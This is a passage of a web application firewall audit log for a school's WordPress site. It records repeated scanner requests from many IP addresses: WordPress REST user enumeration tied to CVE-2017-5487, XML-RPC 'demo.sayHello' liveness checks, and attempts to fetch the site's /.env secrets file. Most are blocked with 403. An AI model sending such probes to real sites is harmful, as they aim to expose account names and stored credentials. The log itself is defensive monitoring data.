"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706274294447 3124 (- - -) Stopwatch2: 1746706274294447 3124; combined=1287, p1=466, p2=795, p3=0, p4=0, p5=26, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04cc8666-Z-- --27f1611e-A-- [08/May/2025:19:11:25 +0700] aByfbacs1DvJ_HgMHE9fBwAAABI 103.236.140.4 47920 103.236.140.4 8181 --27f1611e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27f1611e-C-- demo.sayHello --27f1611e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27f1611e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706285198563 14265 (- - -) Stopwatch2: 1746706285198563 14265; combined=11658, p1=1963, p2=9189, p3=106, p4=205, p5=124, sr=89, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27f1611e-Z-- --c5ecf110-A-- [08/May/2025:19:11:26 +0700] aByfbis5rYyn3jlLjjIVFQAAAMk 103.236.140.4 47922 103.236.140.4 8181 --c5ecf110-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5ecf110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5ecf110-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706286239887 2758 (- - -) Stopwatch2: 1746706286239887 2758; combined=1339, p1=473, p2=838, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5ecf110-Z-- --15b3ce19-A-- [08/May/2025:19:15:25 +0700] aBygXSs5rYyn3jlLjjIVFwAAAMI 103.236.140.4 47940 103.236.140.4 8181 --15b3ce19-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15b3ce19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15b3ce19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706525307765 3386 (- - -) Stopwatch2: 1746706525307765 3386; combined=1404, p1=473, p2=899, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15b3ce19-Z-- --a458501b-A-- [08/May/2025:19:15:27 +0700] aBygX44K347NtBcwXKxgdAAAAJY 103.236.140.4 47944 103.236.140.4 8181 --a458501b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a458501b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a458501b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706527610962 2162 (- - -) Stopwatch2: 1746706527610962 2162; combined=1061, p1=354, p2=678, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a458501b-Z-- --e8cfe00c-A-- [08/May/2025:19:15:29 +0700] aBygYSs5rYyn3jlLjjIVGAAAAMo 103.236.140.4 47948 103.236.140.4 8181 --e8cfe00c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e8cfe00c-C-- demo.sayHello --e8cfe00c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8cfe00c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706529906342 5009 (- - -) Stopwatch2: 1746706529906342 5009; combined=3871, p1=467, p2=3203, p3=26, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8cfe00c-Z-- --36f82c06-A-- [08/May/2025:19:15:43 +0700] aBygb8P9GxxPAbCroFYsmgAAAEM 103.236.140.4 47952 103.236.140.4 8181 --36f82c06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36f82c06-C-- demo.sayHello --36f82c06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f82c06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706543463691 7003 (- - -) Stopwatch2: 1746706543463691 7003; combined=5030, p1=655, p2=4023, p3=42, p4=50, p5=190, sr=85, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f82c06-Z-- --2561c568-A-- [08/May/2025:19:38:00 +0700] aBylqMP9GxxPAbCroFYsowAAAEE 103.236.140.4 48266 103.236.140.4 8181 --2561c568-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.161.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.161.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2561c568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2561c568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746707880755251 3256 (- - -) Stopwatch2: 1746707880755251 3256; combined=1382, p1=472, p2=876, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2561c568-Z-- --b78e230e-A-- [08/May/2025:19:44:05 +0700] aBynFacs1DvJ_HgMHE9fEgAAAAA 103.236.140.4 48286 103.236.140.4 8181 --b78e230e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b78e230e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b78e230e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746708245528976 3468 (- - -) Stopwatch2: 1746708245528976 3468; combined=1516, p1=532, p2=946, p3=0, p4=0, p5=38, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b78e230e-Z-- --fadc493d-A-- [08/May/2025:20:10:05 +0700] aBytLacs1DvJ_HgMHE9glQAAAAY 103.236.140.4 49180 103.236.140.4 8181 --fadc493d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fadc493d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fadc493d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746709805628556 3158 (- - -) Stopwatch2: 1746709805628556 3158; combined=1383, p1=488, p2=858, p3=0, p4=0, p5=37, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fadc493d-Z-- --6ae44b28-A-- [08/May/2025:20:10:10 +0700] aBytMqcs1DvJ_HgMHE9glwAAAAs 103.236.140.4 49184 103.236.140.4 8181 --6ae44b28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ae44b28-C-- demo.sayHello --6ae44b28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae44b28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746709810664049 4925 (- - -) Stopwatch2: 1746709810664049 4925; combined=3944, p1=479, p2=3266, p3=23, p4=26, p5=88, sr=93, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae44b28-Z-- --2c036d47-A-- [08/May/2025:20:28:48 +0700] aByxkKcs1DvJ_HgMHE9gpgAAAAw 103.236.140.4 49300 103.236.140.4 8181 --2c036d47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.187.172.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.187.172.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2c036d47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c036d47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746710928082279 3349 (- - -) Stopwatch2: 1746710928082279 3349; combined=1416, p1=478, p2=905, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c036d47-Z-- --c0aed912-A-- [08/May/2025:20:33:24 +0700] aByypKcs1DvJ_HgMHE9grAAAAAc 103.236.140.4 49318 103.236.140.4 8181 --c0aed912-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.217.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.217.4 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0aed912-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0aed912-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746711204033960 3252 (- - -) Stopwatch2: 1746711204033960 3252; combined=1406, p1=496, p2=878, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0aed912-Z-- --9781074f-A-- [08/May/2025:20:37:27 +0700] aByzlys5rYyn3jlLjjIVNQAAAMY 103.236.140.4 49350 103.236.140.4 8181 --9781074f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 149.88.24.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 149.88.24.163 X-Forwarded-Proto: https Connection: close user-agent: python-httpx/0.13.3 accept: */* --9781074f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9781074f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746711447242802 858 (- - -) Stopwatch2: 1746711447242802 858; combined=385, p1=348, p2=0, p3=0, p4=0, p5=37, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9781074f-Z-- --ab212e79-A-- [08/May/2025:20:54:52 +0700] aBy3rI4K347NtBcwXKxg_wAAAJc 103.236.140.4 49446 103.236.140.4 8181 --ab212e79-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.91.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.91.171.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab212e79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab212e79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746712492547371 5510 (- - -) Stopwatch2: 1746712492547371 5510; combined=2582, p1=813, p2=1720, p3=0, p4=0, p5=49, sr=172, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab212e79-Z-- --f2653e57-A-- [08/May/2025:21:02:00 +0700] aBy5WKcs1DvJ_HgMHE9gwQAAABA 103.236.140.4 49492 103.236.140.4 8181 --f2653e57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36 Accept-Charset: utf-8 --f2653e57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2653e57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746712920035356 793 (- - -) Stopwatch2: 1746712920035356 793; combined=318, p1=279, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2653e57-Z-- --e381191f-A-- [08/May/2025:21:02:26 +0700] aBy5co4K347NtBcwXKxhAwAAAIY 103.236.140.4 49494 103.236.140.4 8181 --e381191f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e381191f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e381191f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746712946984267 3936 (- - -) Stopwatch2: 1746712946984267 3936; combined=1545, p1=586, p2=921, p3=0, p4=0, p5=38, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e381191f-Z-- --fa44b977-A-- [08/May/2025:21:02:32 +0700] aBy5eKcs1DvJ_HgMHE9gwgAAABU 103.236.140.4 49498 103.236.140.4 8181 --fa44b977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa44b977-C-- demo.sayHello --fa44b977-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa44b977-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 